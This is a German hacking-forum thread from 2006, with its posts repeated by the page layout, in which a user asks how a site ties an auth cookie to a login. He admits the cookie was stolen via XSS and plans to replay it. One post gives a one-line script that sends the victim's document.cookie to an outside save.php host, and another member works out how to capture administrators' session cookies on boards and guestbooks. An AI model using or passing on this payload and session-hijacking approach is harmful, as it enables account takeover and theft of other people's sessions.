[HaBo]

Xalon · 19.01.06, 16:11

Ich hab mal wieder paar Probleme mit Cookies ;)
Also,erst mal alle Cookies der Seite in der Lokalen Cookiedatei:

Code:

.seite.de	TRUE	/	FALSE	1137684015	__utmb	79435669
.seite.de	TRUE	/	FALSE	2147385600	__utma	79435669.953149259.1134761371.1137680812.1137682216.89
.seite.de	TRUE	/	FALSE	1168440615	auth	TlJcVx5GSURJEk5ZFVVGRh1VVx5VTB4UUFwUXRteR3dOBAADRxQaTkBaB1UWTVUWG1ZTFkNAQxdDXBo%3D
.seite.de	TRUE	/	FALSE	1152013888	__utmz	79435669.1136245889.58.2.utmccn=(organic)|utmcsr=google|utmctr=nudelkind|utmcmd=organic
.www.seite.de	TRUE	/	FALSE	1168440615	auth	TlJcVx5GSURJEk5ZFVVGRh1VVx5VTB4UUFwUXRteR3dOBAADRxQaTkBaB1UWTVUWG1ZTFkNAQxdDXBo%3D

So,mehr steht nicht in der Cookiedatei...
Wenn ich jetzt auf der Seite meine Cookies via document.cookie ausgeben lasse kommt folgendes:

Code:

auth=TlJcVx5GSURJEk5ZFVVGRh1VVhxVTB4UUFwUXRheR3dOBAADAg1IHUhTTxwVTk1VTlVQG05DQBpYRVwa;%20session=4x%7CBW;%20__utma=79435669.1421511096.1137259645.1137524527.1137528250.6;%20__utmb=79435669;%20__utmz=79435669.1137259645.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none);%20auth=TlJcVx5GSURJEk5ZFVVGRh1VVhxVTB4UUFwUXRheR3dOBAADAg1IHUhTTxwVTk1VTlVQG05DQBpYRVwa;%20__utmc=79435669

Jetzt mal meine Frage:Kann jemand erkennen an was einen díe Seite wiedererkennt?Also an was sie erkennt unter welchem Namen man sich eingeloggt hat?

Danke im voraus,
Xalon

Lord_Nykon · 19.01.06, 17:27

also sehr oft wird in dem cookie nur ein session key abgelegt, zu welchem passend die daten nicht im cookie sondern auf den jeweiligen servern liegen.

Sagen wir mal ich bin ein Server (

) und du kommst jetzt mit deinem Namen bei mir vorbei...dein name speichere ich dann und gebe dir einen Session-key (unter dem ich den namen wiederfinden kann...macht natürlich erst sinn bei informationen, die etwas umfangreicher sind als Namen). So ähnlich als wenn du ne URL eingibst. In der URL sind ja auch nicht die Webinhalte der Seite gespeichert, sondern es ist nur die Adresse, die auf den Inhalt der Seite verweißt.

MfG
Lord

Anzeige

- Anzeige -

Xalon · 19.01.06, 19:27

Jaja,keine Angst,das weiß ich schon^^
Nur variablen wie __utmb __utma __utmz und auth werden ja immer gespeichert,also frage ich mich wo die Seite den Sessionkey hernimmt o_O

Hierher vielleicht:

Code:

.www.seite.de	TRUE	/	FALSE	1168440615	auth	TlJcVx5GSURJEk5ZFVVGRh1VVx5VTB4UUFwUXRteR3dOBAADRxQaTkBaB1UWTVUWG1ZTFkNAQxdDXBo%3D

Naja das gleicht ja fast

Code:

.seite.de	TRUE	/	FALSE	1168440615	auth	TlJcVx5GSURJEk5ZFVVGRh1VVx5VTB4UUFwUXRteR3dOBAADRxQaTkBaB1UWTVUWG1ZTFkNAQxdDXBo%3D

oder hier im Cookieoutput mit Java is vollgendes:

Code:

session=4x%7CBW;

Wo wird das gespeichert?In der Cookiedatei is des net...Wo dann?

Oder is das ne besondere Variable?

Also meine Frage wo spiechert der Server den Authentication-Cookie?

Danke im Voraus,
Xalon

P.S.:
@Lord_Nykon:Biste n Apache odern ISS? xD

Lord_Nykon · 19.01.06, 23:25

Okay, dann tut's mir Leid.
Da habe ich deine Frage ein wenig falsch verstanden^^ Sorry.

Da kann ich leider im Moment nicht weiterhelfen.

MfG
Lord

P.S.: Weder noch

Ich bin mein eigener Server mit dem Namen HNS aka "Human Network System"

*scnr*

Xalon · 20.01.06, 22:02

Hmm,
und kann mir wer anders helfen?Wär echt wichtig

Xalon

ElLute · 21.01.06, 10:05

also mit den spärlichen infos wirst du kaum infos bekommen die dir weiterhelfen... und server sind normalerweise nicht so blöd, dass sie sich von einem gefälschtem cookie linken lassen

Xalon · 21.01.06, 10:08

Zitat:

Original von ElLute
also mit den spärlichen infos wirst du kaum infos bekommen die dir weiterhelfen... und server sind normalerweise nicht so blöd, dass sie sich von einem gefälschtem cookie linken lassen

Und woher soll der Server das merken?Und welche Infos bracht ihr noch?

Xalon

ElLute · 21.01.06, 18:47

der server kriegt von dir eine ID die nach einem bestimmten algorithmus generiert wurde, also sieht er, obs eine ID von ihm ist... und dann sieht er in seiner Datenbank nach den dazu gespeicherten daten nach und schickt dir dann deine persönliche seite... so war glaub ich das konzept von cookies...

Xalon · 22.01.06, 13:03

Jap ich weiß den Cookie den ich schicke hab ich ja über XSS geklaut

Naja ich schreib mir ez einfach selbr ein Programm um dann die Cookies zu nutzen dann bracuh ich Firefox gar nimmer^^

Xalon

Nick H. · 22.01.06, 19:30

wie soll man den über XSS Cookies klauen?

ivegotmail · 22.01.06, 19:41

Zitat:

Original von Nick H.
wie soll man den über XSS Cookies klauen?

http://wiki.hackerboard.de/index.php...l_eins_Cookies
http://www.thegeek.de/blog/type/codi...f/post/68.html

Xalon · 23.01.06, 13:28

Na indem man folgendes ausführen lässt:
location.href="blubb.de/save.php?to_save="+document.cookie
Noch besser natürlich in nem Iframe

Xalon

Edit:Ups hab ivegotmail's net glesen

Nick H. · 23.01.06, 15:55

also im prinzip geht es darum Code einzuschleusen,
sobald sich dann zB in einem Board ein Admin einloggt
wird dessen cookie gespeichert (per email an mich geschickt oder sowas)
und man hat die Zugangsdaten

hab ich das jetzt richtig verstanden?

Xalon · 23.01.06, 16:03

Nicht die Zugangsdaten sondern den Cookie

Xalon

Nick H. · 23.01.06, 17:54

stimmt, meinte ich auch eigentlich
man hat das cookie und dann hat man zugang

die Lücke gefällt mir

es gibt bestimmt n'paar Gästebücher, News-Systeme oder sonstwas,
bei denen sich das einfach ausnutzen lässt

bis jetzt hab ich immer nur an include() gedacht

Anzeige

- Anzeige -

19.01.06, 19:27	#3 (permalink)
Xalon Themenstarter Registriert seit: 23.05.05 Likes: 0	Jaja,keine Angst,das weiß ich schon^^ Nur variablen wie __utmb __utma __utmz und auth werden ja immer gespeichert,also frage ich mich wo die Seite den Sessionkey hernimmt o_O Hierher vielleicht: Code: .www.seite.de TRUE / FALSE 1168440615 auth TlJcVx5GSURJEk5ZFVVGRh1VVx5VTB4UUFwUXRteR3dOBAADRxQaTkBaB1UWTVUWG1ZTFkNAQxdDXBo%3D Naja das gleicht ja fast Code: .seite.de TRUE / FALSE 1168440615 auth TlJcVx5GSURJEk5ZFVVGRh1VVx5VTB4UUFwUXRteR3dOBAADRxQaTkBaB1UWTVUWG1ZTFkNAQxdDXBo%3D oder hier im Cookieoutput mit Java is vollgendes: Code: session=4x%7CBW; Wo wird das gespeichert?In der Cookiedatei is des net...Wo dann? Oder is das ne besondere Variable? Also meine Frage wo spiechert der Server den Authentication-Cookie? Danke im Voraus, Xalon P.S.: @Lord_Nykon:Biste n Apache odern ISS? xD

Themen-Optionen
Druckbare Version zeigen Jemanden per E-Mail auf dieses Thema hinweisen
Ansicht
Linear-Darstellung Zur Hybrid-Darstellung wechseln Zur Baum-Darstellung wechseln

Ähnliche Themen
Thema	Autor	Forum	Antworten	Letzter Beitrag
Laptop erkennt anscheinend meine Festplatte nicht mehr	WebSTAR	Hardware Probleme	2	08.11.08 17:26
Netgear Router erkennt meine Netzwerkkarte nicht	Heavyl	Network · LAN, WAN, Firewalls	11	12.03.08 06:01
Erkennt meine 40GB HD, aber kein Zugriff möglich	Santo	Windows	6	24.02.04 14:36
XP erkennt meine Hardware (USB) nicht	xGSxMalk	Windows	2	24.04.03 22:27
Mandrake 8.1 erkennt meine Soundkarte nicht.	rompastompa	Linux/UNIX	1	07.07.02 19:22

19.01.06, 17:27	#2 (permalink)
Lord_Nykon Registriert seit: 04.03.04 Likes: 0	also sehr oft wird in dem cookie nur ein session key abgelegt, zu welchem passend die daten nicht im cookie sondern auf den jeweiligen servern liegen. Sagen wir mal ich bin ein Server ( ) und du kommst jetzt mit deinem Namen bei mir vorbei...dein name speichere ich dann und gebe dir einen Session-key (unter dem ich den namen wiederfinden kann...macht natürlich erst sinn bei informationen, die etwas umfangreicher sind als Namen). So ähnlich als wenn du ne URL eingibst. In der URL sind ja auch nicht die Webinhalte der Seite gespeichert, sondern es ist nur die Adresse, die auf den Inhalt der Seite verweißt. MfG Lord

19.01.06, 23:25	#4 (permalink)
Lord_Nykon Registriert seit: 04.03.04 Likes: 0	Okay, dann tut's mir Leid. Da habe ich deine Frage ein wenig falsch verstanden^^ Sorry. Da kann ich leider im Moment nicht weiterhelfen. MfG Lord P.S.: Weder noch Ich bin mein eigener Server mit dem Namen HNS aka "Human Network System" scnr

20.01.06, 22:02	#5 (permalink)
Xalon Themenstarter Registriert seit: 23.05.05 Likes: 0	Hmm, und kann mir wer anders helfen?Wär echt wichtig Xalon

21.01.06, 10:05	#6 (permalink)
ElLute Registriert seit: 24.08.05 Likes: 0	also mit den spärlichen infos wirst du kaum infos bekommen die dir weiterhelfen... und server sind normalerweise nicht so blöd, dass sie sich von einem gefälschtem cookie linken lassen

21.01.06, 18:47	#8 (permalink)
ElLute Registriert seit: 24.08.05 Likes: 0	der server kriegt von dir eine ID die nach einem bestimmten algorithmus generiert wurde, also sieht er, obs eine ID von ihm ist... und dann sieht er in seiner Datenbank nach den dazu gespeicherten daten nach und schickt dir dann deine persönliche seite... so war glaub ich das konzept von cookies...

22.01.06, 13:03	#9 (permalink)
Xalon Themenstarter Registriert seit: 23.05.05 Likes: 0	Jap ich weiß den Cookie den ich schicke hab ich ja über XSS geklaut Naja ich schreib mir ez einfach selbr ein Programm um dann die Cookies zu nutzen dann bracuh ich Firefox gar nimmer^^ Xalon

22.01.06, 19:30	#10 (permalink)
Nick H. Registriert seit: 20.09.05 Likes: 0	wie soll man den über XSS Cookies klauen?

23.01.06, 13:28	#12 (permalink)
Xalon Themenstarter Registriert seit: 23.05.05 Likes: 0	Na indem man folgendes ausführen lässt: location.href="blubb.de/save.php?to_save="+document.cookie Noch besser natürlich in nem Iframe Xalon Edit:Ups hab ivegotmail's net glesen

23.01.06, 15:55	#13 (permalink)
Nick H. Registriert seit: 20.09.05 Likes: 0	also im prinzip geht es darum Code einzuschleusen, sobald sich dann zB in einem Board ein Admin einloggt wird dessen cookie gespeichert (per email an mich geschickt oder sowas) und man hat die Zugangsdaten hab ich das jetzt richtig verstanden?

23.01.06, 16:03	#14 (permalink)
Xalon Themenstarter Registriert seit: 23.05.05 Likes: 0	Nicht die Zugangsdaten sondern den Cookie Xalon

23.01.06, 17:54	#15 (permalink)
Nick H. Registriert seit: 20.09.05 Likes: 0	stimmt, meinte ich auch eigentlich man hat das cookie und dann hat man zugang die Lücke gefällt mir es gibt bestimmt n'paar Gästebücher, News-Systeme oder sonstwas, bei denen sich das einfach ausnutzen lässt bis jetzt hab ich immer nur an include() gedacht

[HaBo]

An was erkennt die Seite ob meine Cookies stimmen?